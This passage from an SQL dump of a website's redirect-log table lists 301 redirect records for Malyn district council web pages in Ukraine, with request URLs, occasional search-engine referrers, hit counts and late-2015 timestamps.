21:55:08','0000-00-00 00:00:00',301),(19692,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=330:2011-05-20-16-28-08&catid=33:-20052011&Itemid=66&lang=uk','','','',8,0,'2015-11-24 21:55:16','0000-00-00 00:00:00',301),(19693,'http://malyn-rayrada.org.ua/index.php/1073-15-kvitnya-blagodijnij-kontsert-v-rbk','','','',28,0,'2015-11-24 22:40:41','0000-00-00 00:00:00',301),(19694,'http://www.malyn-rayrada.org.ua/index.php/52-vitaemo-iz-pershim-dnem-vesni?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-25 02:00:55','0000-00-00 00:00:00',301),(19695,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=762:-210-&lang=en','','','',2,0,'2015-11-25 04:17:44','0000-00-00 00:00:00',301),(19696,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=808:2012-10-30-13-56-37&Itemid=14&lang=uk','','','',4,0,'2015-11-25 04:17:51','0000-00-00 00:00:00',301),(19697,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=808:2012-10-30-13-56-37&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2015-11-25 04:17:51','0000-00-00 00:00:00',301),(19698,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=808:2012-10-30-13-56-37&catid=11&Itemid=14&lang=uk','','','',2,0,'2015-11-25 04:17:51','0000-00-00 00:00:00',301),(19699,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=815:-16-6-&Itemid=14&lang=uk','','','',2,0,'2015-11-25 04:17:52','0000-00-00 00:00:00',301),(19700,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=824:-2012-&Itemid=84&lang=ru','','','',2,0,'2015-11-25 04:17:55','0000-00-00 00:00:00',301),(19701,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=46&Itemid=85&lang=ru&limitstart=5','','','',3,0,'2015-11-25 04:20:50','0000-00-00 00:00:00',301),(19702,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=441:-l-2011-2014-r-&catid=37&Itemid=72&lang=uk','','','',3,0,'2015-11-25 04:20:51','0000-00-00 00:00:00',301),(19703,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=349:--------20--2011--108-l---r&catid=34&Itemid=68&lang=uk','','','',2,0,'2015-11-25 04:20:59','0000-00-00 00:00:00',301),(19704,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=211:2010-12-15-14-46-24&catid=29:--15122010-&Itemid=60&lang=uk','','','',3,0,'2015-11-25 04:20:59','0000-00-00 00:00:00',301),(19705,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=205:--------2011--&catid=29:--15122010-&Itemid=60&lang=uk','','','',4,0,'2015-11-25 04:20:59','0000-00-00 00:00:00',301),(19706,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/560-pro-stan-cilovogo-vikoristannja-zemel','','','',24,0,'2015-11-25 04:25:18','0000-00-00 00:00:00',301),(19708,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=142:2010-10-15-06-19-49&catid=27:---1932-33-&Itemid=58&lang=uk/','','','',1,0,'2015-11-25 08:10:56','0000-00-00 00:00:00',301),(19709,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-?start=7','','','',1,0,'2015-11-25 08:10:57','0000-00-00 00:00:00',301),(19710,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&id=46:--21122012&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','','',1,0,'2015-11-25 08:55:39','0000-00-00 00:00:00',301),(19711,'http://www.malyn-rayrada.org.ua/index.php/1218-16-zhovtnya-2015-roku-vidbudetsya-spilnij-seminar-navchannya-dlya-platnikiv-podatkiv?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-25 09:11:26','0000-00-00 00:00:00',301),(19712,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/8-pro-zatverdzhennja-metodiki-rozrahunku-orendnoi','','','',4,0,'2015-11-25 10:37:45','0000-00-00 00:00:00',301),(19713,'http://www.malyn-rayrada.org.ua/index.php/641-pitannja-rozrahunkiv-rozporjadnikiv-koshtiv?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-25 11:24:09','0000-00-00 00:00:00',301),(19714,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=194:-----------2008-2010-&lang=uk&option=com_content&view=article','','','',1,0,'2015-11-25 11:56:59','0000-00-00 00:00:00',301),(19715,'http://www.malyn-rayrada.org.ua/index.php?Itemid=96&catid=55:--26122013-&id=1169:2014-01-08-07-30-47&lang=uk&option=com_content&view=article','','','',1,0,'2015-11-25 14:49:51','0000-00-00 00:00:00',301),(19716,'http://www.malyn-rayrada.org.ua/index.php/477-priznachennja-tizhnja_2?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-25 15:12:31','0000-00-00 00:00:00',301),(19717,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1200-pro-povtorne-zvernennya-do-prokuraturi-malinskogo-rajonu','','','',6,0,'2015-11-25 15:23:17','0000-00-00 00:00:00',301),(19718,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=639:2012-04-03-12-41-18&catid=42:--16052012-&Itemid=80&lang=uk','','','',4,0,'2015-11-25 15:47:57','0000-00-00 00:00:00',301),(19719,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=483:-2012-2016-&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-25 16:27:18','0000-00-00 00:00:00',301),(19720,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1147-lyubovitska-silska-rada-informue?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',2,0,'2015-11-25 17:58:30','0000-00-00 00:00:00',301),(19722,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=153:2010-10-26-13-18-23&catid=11:2010-06-05-14-33-33&Itemid=16&lang=uk','','','',12,0,'2015-11-25 19:59:27','0000-00-00 00:00:00',301),(19723,'http://malyn-rayrada.org.ua/index.php/721-verhovna-rada-zatverdila-sklad-kabinetu-ministriv','','','',13,0,'2015-11-25 20:03:28','0000-00-00 00:00:00',301),(19725,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=546:-l-r-&catid=39&Itemid=76&lang=uk','','','',5,0,'2015-11-25 20:50:16','0000-00-00 00:00:00',301),(19726,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=835:2012-12-02-07-47-14&catid=11&Itemid=14&lang=en','','','',14,0,'2015-11-25 21:16:55','0000-00-00 00:00:00',301),(19727,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/368-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_7','','','',10,0,'2015-11-25 21:37:58','0000-00-00 00:00:00',301),(19728,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=834:-20-&catid=11&lang=uk&Itemid=','','','',5,0,'2015-11-25 21:44:46','0000-00-00 00:00:00',301),(19730,'http://malyn-rayrada.org.ua/index.php/83-deputati-radilis-shhodo-situacii-v-kp-trs-polissja','','','',5,0,'2015-11-25 22:49:45','0000-00-00 00:00:00',301),(19731,'http://www.malyn-rayrada.org.ua/index.php?id=40&Itemid=77&lang=ru&layout=blog&option=com_content&view=category','','','',5,0,'2015-11-25 23:30:04','0000-00-00 00:00:00',301),(19732,'http://www.malyn-rayrada.org.ua/index.php?id=41&Itemid=78&lang=uk&layout=blog&option=com_content&view=category','','','',5,0,'2015-11-25 23:30:18','0000-00-00 00:00:00',301),(19733,'http://www.malyn-rayrada.org.ua/index.php?id=51&Itemid=92&lang=uk&layout=blog&option=com_content&view=category','','','',5,0,'2015-11-25 23:30:47','0000-00-00 00:00:00',301),(19734,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=524:2011-12-30-10-17-39&catid=38:--19122011-&Itemid=73&lang=uk','','','',3,0,'2015-11-25 23:31:44','0000-00-00 00:00:00',301),(19735,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=862:-qq&catid=15&lang=uk','','','',1,0,'2015-11-25 23:39:22','0000-00-00 00:00:00',301),(19736,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1143-chopovitska-selishchna-rada-informue-pro-zatverdzhennya-polozhennya?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-26 00:13:28','0000-00-00 00:00:00',301),(19737,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02/59-rishennja-radi/rishennja/-22022012-?lang=ru&limitstart=0','','','',3,0,'2015-11-26 02:53:00','0000-00-00 00:00:00',301),(19738,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37&id=437:-----l-r--2012-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2015-11-26 02:55:12','0000-00-00 00:00:00',301),(19739,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=483:-2012-2016-&catid=38:--19122011-&Itemid=73&lang=ru','','','',5,0,'2015-11-26 04:48:03','0000-00-00 00:00:00',301),(19740,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=744:2012-07-28-09-50-03&lang=uk&option=com_content&view=article','','','',5,0,'2015-11-26 07:31:42','0000-00-00 00:00:00',301),(19741,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=238:2011-01-21-19-37-43&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2015-11-26 09:37:02','0000-00-00 00:00:00',301),(19742,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=742:-14-&catid=11&Itemid=14&lang=uk','','','',1,0,'2015-11-26 10:25:15','0000-00-00 00:00:00',301),(19743,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=861:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=en','','','',1,0,'2015-11-26 10:25:46','0000-00-00 00:00:00',301),(19745,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=237:-2010-&catid=11&Itemid=16&lang=en','','','',11,0,'2015-11-26 11:48:32','0000-00-00 00:00:00',301),(19746,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=48&Itemid=87&lang=uk','','','',4,0,'2015-11-26 13:27:27','0000-00-00 00:00:00',301),(19747,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=48&layout=blog&Itemid=87&lang=uk','','','',1,0,'2015-11-26 13:31:17','0000-00-00 00:00:00',301),(19748,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=51&Itemid=92&lang=uk','','','',4,0,'2015-11-26 17:08:29','0000-00-00 00:00:00',301),(19749,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=51&layout=blog&Itemid=92&lang=uk','','','',1,0,'2015-11-26 17:14:12','0000-00-00 00:00:00',301),(19750,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=33&Itemid=66&lang=ru&limitstart=20','','','',11,0,'2015-11-26 18:15:43','0000-00-00 00:00:00',301),(19752,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1085-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-pro-normativnu-groshovu-otsinku-zemelnoji-dilyanki-shcho-peredaetsya-v-orendu-gr-andrijchuk-t-i-ta-gr-andrijchuk-v-i','','','',9,0,'2015-11-26 21:32:49','0000-00-00 00:00:00',301),(19753,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=39:-22022012-&layout=blog&Itemid=76&lang=ru&limitstart=20','','','',1,0,'2015-11-26 21:34:15','0000-00-00 00:00:00',301),(19754,'http://www.malyn-rayrada.org.ua/index.php/523-vidbulas-21-pozachergova-sesija-rajonnoi-radi?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-26 22:25:58','0000-00-00 00:00:00',301),(19755,'http://malyn-rayrada.org.ua/index.php/759-ogoloshennja_14','','','',9,0,'2015-11-26 22:53:01','0000-00-00 00:00:00',301),(19756,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1157-gorinska-silska-rada-informue?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',2,0,'2015-11-27 00:09:24','0000-00-00 00:00:00',301),(19757,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&id=47:-21022013-&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2015-11-27 03:13:51','0000-00-00 00:00:00',301),(19758,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1095:2013-09-24-13-25-55&lang=uk&option=com_content&view=article','','','',5,0,'2015-11-27 09:16:10','0000-00-00 00:00:00',301),(19759,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=677:------------2012-2015-&catid=42&Itemid=80&lang=en','','','',3,0,'2015-11-27 13:25:37','0000-00-00 00:00:00',301),(19760,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1150-dibrivska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-27 14:49:07','0000-00-00 00:00:00',301),(19761,'http://www.malyn-rayrada.org.ua/index.php/479-porjadok-dennij-18-sesii-rajonnoi-radi-6?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-27 14:49:37','0000-00-00 00:00:00',301),(19762,'http://www.malyn-rayrada.org.ua/index.php/71-novo-vorob’ivskij-znvkshkola-sad-i-iii-stupeniv','','','',5,0,'2015-11-27 14:49:39','0000-00-00 00:00:00',301),(19763,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1153-novovorobjivska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-27 14:50:17','0000-00-00 00:00:00',301),(19764,'http://www.malyn-rayrada.org.ua/index.php/637-vidbulos-zasidannja-24-sesii-6-sklikannja','','','',11,0,'2015-11-27 14:50:37','0000-00-00 00:00:00',301),(19765,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1151-morozivska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-27 14:51:05','0000-00-00 00:00:00',301),(19766,'http://malyn-rayrada.org.ua/index.php/723-pro-nevidkladni-zahodi-shhodo-zabezpechennja','','','',7,0,'2015-11-27 17:03:43','0000-00-00 00:00:00',301),(19768,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1011:2013-05-29-09-51-28&lang=uk&option=com_content&view=article','','','',3,0,'2015-11-27 18:05:39','0000-00-00 00:00:00',301),(19769,'http://www.malyn-rayrada.org.ua/attachments/477_додаток 1_Дефектний акт.pdf','','','',4,0,'2015-11-28 00:59:47','0000-00-00 00:00:00',301),(19770,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=46&Itemid=85&lang=uk&limitstart=15','','','',5,0,'2015-11-28 03:03:31','0000-00-00 00:00:00',301),(19771,'http://malyn-rayrada.org.ua/index.php/797-vidbulas-koordinacijna-rada-pri-golovi-rajonnoi','','','',5,0,'2015-11-28 05:14:22','0000-00-00 00:00:00',301),(19772,'http://www.malyn-rayrada.org.ua/index.php?Itemid=61&catid=30&id=230:---3----6--30--2010-&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-28 07:48:00','0000-00-00 00:00:00',301),(19773,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=546:-l-r-&Itemid=76&lang=ru&option=com_content&view=article','','','',1,0,'2015-11-28 09:12:54','0000-00-00 00:00:00',301),(19775,'http://www.malyn-rayrada.org.ua/index.php?id=59:--20062014-&Itemid=107&lang=ru&layout=blog&option=com_content&view=category','','','',1,0,'2015-11-28 09:13:34','0000-00-00 00:00:00',301),(19776,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-?start=10','','','',61,0,'2015-11-28 09:13:37','0000-00-00 00:00:00',301),(19777,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=767:2012-10-01-08-20-30&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-11-28 09:27:26','0000-00-00 00:00:00',301),(19778,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/962-pro-vstanovlennya-orendnoji-plati','','','',26,0,'2015-11-28 09:29:09','0000-00-00 00:00:00',301),(19779,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=126:2010-09-13-08-28-01&catid=11&Itemid=16&lang=ru','','','',12,0,'2015-11-28 09:56:22','0000-00-00 00:00:00',301),(19780,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=707:-231-280312-l-2012-r&catid=43:--25072012-&Itemid=82&lang=uk','','','',10,0,'2015-11-28 15:11:00','0000-00-00 00:00:00',301),(19781,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=230:---3----6--30--2010-&catid=30&Itemid=61&lang=uk','','','',13,0,'2015-11-28 15:53:36','0000-00-00 00:00:00',301),(19782,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=236:-192011-&catid=11&Itemid=14&lang=ru','','','',12,0,'2015-11-28 19:47:10','0000-00-00 00:00:00',301),(19783,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=70:2010-07-23-07-25-34&catid=11:2010-06-05-14-33-33&Itemid=16&lang=ru','','','',11,0,'2015-11-28 20:42:06','0000-00-00 00:00:00',301),(19784,'http://www.malyn-rayrada.org.ua/index.php?Itemid=105&id=58&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2015-11-29 04:58:58','0000-00-00 00:00:00',301),(19785,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=542:-2011-&catid=39&Itemid=76&lang=en','','','',14,0,'2015-11-29 08:43:38','0000-00-00 00:00:00',301),(19786,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=412:-165-&catid=37&Itemid=72&lang=uk','','','',11,0,'2015-11-29 09:20:39','0000-00-00 00:00:00',301),(19787,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=587:2012-02-27-13-44-05&catid=40:--28032012-&Itemid=77&lang=en','','','',10,0,'2015-11-29 09:57:38','0000-00-00 00:00:00',301),(19788,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1192:-2014-2015-&Itemid=97&lang=ru&option=com_content&view=article','','','',4,0,'2015-11-29 13:24:58','0000-00-00 00:00:00',301),(19789,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=534:2012-01-18-07-20-02&catid=32:2011-03-31-12-03-04&Itemid=64&lang=uk','','','',9,0,'2015-11-29 18:13:09','0000-00-00 00:00:00',301),(19790,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=619:-11-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',11,0,'2015-11-29 21:16:37','0000-00-00 00:00:00',301),(19791,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=181:2010-12-03-12-11-55&catid=11:2010-06-05-14-33-33&Itemid=16&lang=uk','','','',1,0,'2015-11-30 01:18:36','0000-00-00 00:00:00',301),(19792,'http://malyn-rayrada.org.ua/index.php/897-vitaemo-oleksiya-grigorovicha-iz-vpevnenoyu-peremogoyu','','','',5,0,'2015-11-30 04:11:26','0000-00-00 00:00:00',301),(19793,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/54-pro-hid-vikonannja-rajonnoi-programi-socialnoi','','','',38,0,'2015-11-30 21:04:40','0000-00-00 00:00:00',301),(19794,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-?start=30','','','',24,0,'2015-12-01 03:07:23','0000-00-00 00:00:00',301),(19795,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=37&layout=blog&Itemid=72&lang=uk&limitstart=20','','','',4,0,'2015-12-01 12:28:46','0000-00-00 00:00:00',301),(19796,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/367-pro-peredachu-materialnih-cinnostej?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-01 13:58:13','0000-00-00 00:00:00',301),(19797,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/161-pro-peredachu-chastini-primishhennja-vorsivskoi','','','',8,0,'2015-12-01 13:58:55','0000-00-00 00:00:00',301),(19798,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1195:2014-01-28-13-01-27&lang=uk&option=com_content&view=article','','','',4,0,'2015-12-01 17:16:13','0000-00-00 00:00:00',301),(19799,'http://www.malyn-rayrada.org.ua/index.php/1179-vitannya-sub-ektiv-pidpriemnitskoji-diyalnosti-rajonu-iz-profesijnim-svyatom?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-01 18:03:58','0000-00-00 00:00:00',301),(19800,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/336-pro-vnesennja-zmin-ta-dopovnen-do-rajonnoi','','','',6,0,'2015-12-01 19:33:56','0000-00-00 00:00:00',301),(19801,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=51&Itemid=92&lang=uk&limitstart=5','','','',2,0,'2015-12-01 20:49:59','0000-00-00 00:00:00',301),(19802,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=222:2010-12-22-07-03-57&catid=11&Itemid=16&lang=uk','','','',10,0,'2015-12-01 21:10:55','0000-00-00 00:00:00',301),(19803,'http://www.malyn-rayrada.org.ua/index.php?id=41&Itemid=78&lang=ru&layout=blog&option=com_content&view=category','','','',3,0,'2015-12-01 23:10:58','0000-00-00 00:00:00',301),(19804,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/913-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji','','','',32,0,'2015-12-02 00:00:05','0000-00-00 00:00:00',301),(19805,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1317:2014-05-25-18-25-09&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-02 00:14:54','0000-00-00 00:00:00',301),(19806,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1208:2014-01-31-13-48-49&Itemid=14&lang=en&option=com_content&view=article','','','',5,0,'2015-12-02 00:27:34','0000-00-00 00:00:00',301),(19807,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-?start=20','','','',11,0,'2015-12-02 01:22:22','0000-00-00 00:00:00',301),(19808,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=554:-l-r&catid=39&Itemid=76&lang=en','','','',11,0,'2015-12-02 01:53:47','0000-00-00 00:00:00',301),(19809,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/347-pro-pereukladennja-kontraktu-z-biloshickoju-l-v','','','',17,0,'2015-12-02 02:07:12','0000-00-00 00:00:00',301),(19810,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=481:-2012-2015-&Itemid=73&lang=en&option=com_content&view=article','','','',5,0,'2015-12-02 02:16:01','0000-00-00 00:00:00',301),(19811,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=582:2012-02-27-13-18-37&catid=40&Itemid=77&lang=ru','','','',5,0,'2015-12-02 02:25:07','0000-00-00 00:00:00',301),(19812,'http://www.malyn-rayrada.org.ua/index.php?catid=15:2010-06-06-09-34-01&id=860:09&Itemid=18&lang=ru&option=com_content&view=article','','','',11,0,'2015-12-02 02:32:58','0000-00-00 00:00:00',301),(19813,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=481:-2012-2015-&catid=38&Itemid=73&lang=en','','','',9,0,'2015-12-02 02:34:48','0000-00-00 00:00:00',301),(19815,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=608:2012-03-15-08-40-03&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-02 03:44:36','0000-00-00 00:00:00',301),(19816,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/70-pro-hid-vikonannja-rajonnoi-programi-vidpochinku','','','',23,0,'2015-12-02 06:17:23','0000-00-00 00:00:00',301),(19817,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=169:2010-11-18-06-30-47&catid=28&Itemid=59&lang=ru','','','',10,0,'2015-12-02 06:33:46','0000-00-00 00:00:00',301),(19818,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45&id=794:-lr&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-02 06:46:04','0000-00-00 00:00:00',301),(19819,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=173:2010-11-18-06-49-23&catid=28:-22102010-&Itemid=59&lang=uk','','','',9,0,'2015-12-02 07:01:06','0000-00-00 00:00:00',301),(19820,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=103:2010-08-12-06-54-56&catid=26&Itemid=54&lang=ru','','','',10,0,'2015-12-02 07:26:35','0000-00-00 00:00:00',301),(19821,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=5:-----5-&catid=5&Itemid=6&lang=uk','','','',8,0,'2015-12-02 07:37:32','0000-00-00 00:00:00',301),(19822,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=588:2012-02-27-13-48-51&catid=36&Itemid=70&lang=ru','','','',12,0,'2015-12-02 07:53:54','0000-00-00 00:00:00',301),(19823,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=228:-------2011-&catid=30:--30122010-&Itemid=3&lang=ru','','','',11,0,'2015-12-02 07:57:33','0000-00-00 00:00:00',301),(19824,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=997:-27-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',10,0,'2015-12-02 08:10:18','0000-00-00 00:00:00',301),(19825,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=617:-----l---28r-----&catid=40:--28032012-&Itemid=77&lang=ru','','','',9,0,'2015-12-02 08:50:22','0000-00-00 00:00:00',301),(19826,'http://malyn-rayrada.org.ua/index.php/1179-vitannya-sub-ektiv-pidpriemnitskoji-diyalnosti-rajonu-iz-profesijnim-svyatom?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-12-02 08:52:12','0000-00-00 00:00:00',301),(19827,'http://malyn-rayrada.org.ua/index.php/20-vidbulos-zasidannja-koordinacijnoi-radi-z-pitan?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-02 08:53:06','0000-00-00 00:00:00',301),(19828,'http://malyn-rayrada.org.ua/index.php/407-vorsivska-silska-gromada-znovu-na-zv-jazku?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-02 08:55:28','0000-00-00 00:00:00',301),(19829,'http://malyn-rayrada.org.ua/index.php/408-ogoloshennja_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-02 08:55:32','0000-00-00 00:00:00',301),(19830,'http://malyn-rayrada.org.ua/index.php/579-ogoloshennja_7?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-02 08:55:34','0000-00-00 00:00:00',301),(19831,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/635-pro-nadannja-dozvolu-na-vlashtuvannja-rozgon-v-f?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-02 09:03:22','0000-00-00 00:00:00',301),(19832,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/639-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2013_3?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-02 09:03:32','0000-00-00 00:00:00',301),(19833,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=208:2010-12-15-14-26-03&catid=29:--15122010-&Itemid=60&lang=ru','','http://www.yandex.ua/clck/jsredir?from=www.yandex.ua%3Bsearch%2F%3Bweb%3B%3B&text=%D0%BF%D1%80%D0%BE%20%D1%83%D1%82%D0%B2%D0%BE%D1%80%D0%B5%D0%BD%D0%B','',8,0,'2015-12-02 13:47:23','0000-00-00 00:00:00',301),(19834,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-?limitstart=0','','','',6,0,'2015-12-02 13:55:16','0000-00-00 00:00:00',301),(19835,'http://www.malyn-rayrada.org.ua/index.php/522-nardep-v-s-zhuravskij-prosit-vid-m-ja-azarova?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-02 20:05:20','0000-00-00 00:00:00',301),(19836,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=47:2010-06-16-14-11-37&catid=1:-14052010&Itemid=10&lang=ru','','','',9,0,'2015-12-02 20:44:51','0000-00-00 00:00:00',301),(19838,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=912:2013-01-22-14-14-06&lang=en&option=com_content&view=article','','','',2,0,'2015-12-02 22:00:27','0000-00-00 